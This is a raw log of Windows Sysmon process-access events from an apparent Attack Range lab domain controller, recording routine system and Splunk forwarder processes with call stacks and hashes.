08:00:53.118{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A67D-00000000CF01}1428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B5-60EB-A67D-00000000CF01}1428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.103{466BC892-F6B5-60EB-A67D-00000000CF01}1428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 